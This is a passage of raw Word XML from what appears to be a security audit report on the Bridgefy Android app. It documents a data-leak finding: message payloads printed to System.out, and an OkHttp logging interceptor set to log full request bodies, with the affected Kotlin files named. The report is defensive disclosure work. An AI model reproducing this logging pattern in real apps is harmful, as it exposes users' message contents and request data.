          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>01-20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>12:50:33.300</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="80"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>6049</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="80"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>6049</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System.out:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xjxhx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dc3b1783-9ac7-4e45-8d1d-9e1b006cc104</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cause</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>leak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>example):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-android/Data/src/main/java/me/bridgefy/data/di/ServiceModule.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>leak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>example):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private val </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>serviceLogLevel = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>HttpLoggingInterceptor.Level.BODY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fun </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>setupClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(clientBuilder: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>OkHttpClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Builder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>clientBuilder.connectTimeout(DEFAULT_TIMEOUT_MINUTES.toLong(), TimeUnit.MINUTES)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>clientBuilder.readTimeout(DEFAULT_TIMEOUT_MINUTES.toLong(), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>TimeUnit.MINUTES)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>clientBuilder.addInterceptor { chain -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1907" w:right="2862" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>val </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>requestBuilder = chain.request().newBuilder() requestBuilder.addHeader(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"User-Agent"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>USER_AGENT)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="1907" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>requestBuilder.addHeader(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Accept"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"application/json"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chain.proceed(requestBuilder.build())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="363" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>clientBuilder.addInterceptor(HttpLoggingInterceptor().apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>serviceLogLevel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="219"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>leak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>example):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="369" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-android/Framework/MessageManager/src/main/java/me/bridgefy/framewor k/messagemanager/repository/mqtt/MqttRepositoryImpl.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>leak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>example):</w:t>
      </w:r>
